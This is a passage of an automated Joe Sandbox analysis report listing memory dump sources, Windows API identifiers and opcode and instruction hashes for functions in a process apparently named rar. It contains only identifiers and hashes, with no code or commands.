                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4044681568-0
                                                                                                                                                                                                                              • Opcode ID: f07192c79666a39956ec6c96c62a0ae78d5d429c3948e52a2bea909d14abfe3a
                                                                                                                                                                                                                              • Instruction ID: 7c7b3c7d309a13c9344a814e39287014510d8928ab486adb020c67ba743b1ebd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f07192c79666a39956ec6c96c62a0ae78d5d429c3948e52a2bea909d14abfe3a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A012910E4D1825AFE38BF761C663B954468FA1B10F00813CE82E8B3D3DE1CAC429B53
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                              • Instruction ID: b8f29a8e1daf6622e7a4eaff7c2b2fcdcd802acd728e72ade9e17afaef43e9e9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B01A121A0868281EF749F29E8442782361FB40F78F244731D53D811F5CF3CE986D711
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000800,00007FF6256D305D,?,?,?,?,?,?,?,?,00007FF6256E4126,?,?,?,?,00000800), ref: 00007FF6256D30F0
                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6256E4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6256D3119
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                              • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                              • Instruction ID: 2e036f738f034d2fe308090a60aed569a0b50c9364fa9fb67fb74d1b0efd00e7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02F0AF21B286C141EE709F25FC453B962A0BB4DBD4F400531EA9CC3BA9DE6CD9848A01
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1175261203-0
                                                                                                                                                                                                                              • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                              • Instruction ID: d0e9574e91a8ff7213ac69130fe69289c358dc4d3e2eb360c23a53dfc5ae450e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEF01221B2858186FE709F21EC153FA6364BF9CB84F804131E9CDC2AA9DE2CDA448A11
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1231390398-0
                                                                                                                                                                                                                              • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                              • Instruction ID: d6b1d9af7eac6489bad07ece40dc5b969f5ae1cbd8c6ed62abf6615a807e71ee
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FE06561B7455246DFF85B199895FA91390EB54F80F806035E90BC3E68ED1DD9448B11
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                              • Instruction ID: 29ae2d25c5bd7c6f6c78cf70ea8e0f29330025e815055b14a5c5bb91566ae0c2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89E0ECA1E9954342FF38AFF2AC2527422966F48F44F58D434DD0DC6356EE2CAC458356
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c218665cb4784b1e09b9813841769d5d78bb8eeb534c01a05b6f747a2e571f56
                                                                                                                                                                                                                              • Instruction ID: 0aa8c7dc7c5e20d7db4bef9474d3df19874444219ba8228d915cc8e42ef81502
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c218665cb4784b1e09b9813841769d5d78bb8eeb534c01a05b6f747a2e571f56
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7FE1CE22E1868291FF308E249C446BE2791FF41F88F040135DE4E8B7EADE2DAC45E712
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2e1b03181f3cae9d3374a5f7fc6b0b71652811f921d99ec40cf27a6603eb5490
                                                                                                                                                                                                                              • Instruction ID: 9da893b59a206ccfda00ba15784e06dab31c6d3ff43f2058f38206ad3631c946
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e1b03181f3cae9d3374a5f7fc6b0b71652811f921d99ec40cf27a6603eb5490
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5514773518BD195EB109F24A8442ED37A8FB44F98F18423AEB884B79ADF395452C331
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                              • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                              • Instruction ID: 3f0ce15325e584065e665e72c56a3410a587f1e0e0cdbfbd2969486dd3d36c94
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27417121E8964386FF789F169C6127922A1BFA0F40F548439DD0DCBA95DF3DEC458B42
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CommandLine
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3253501508-0
                                                                                                                                                                                                                              • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                              • Instruction ID: 75afc00c24c4dcf63fad5585fe4b869e1a9283f6b3093a509684ea9b837586f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4201651160D54245EE24FF1668041B95660BF45F97F481435EE4D87BB9DF3DE8419312
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CompareString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1825529933-0
                                                                                                                                                                                                                              • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                              • Instruction ID: ab135be366ce72a24ccf1d92a7ccc958791644b000da6447a37ff794348e2301
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89018661B2C69246EE206F17A81406EE651BB99FC0F5C8834EF8DCBB6ECE3DD4424705
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                              • Instruction ID: cb4fc623fdd86d526c52a7b22173afd5d01b3f3382a07ea05d2d1b307833d93d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44014F54A9C64340FE749F665F6477A11925F84FE4F58C230ED1DC62D6ED2DEC014207
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
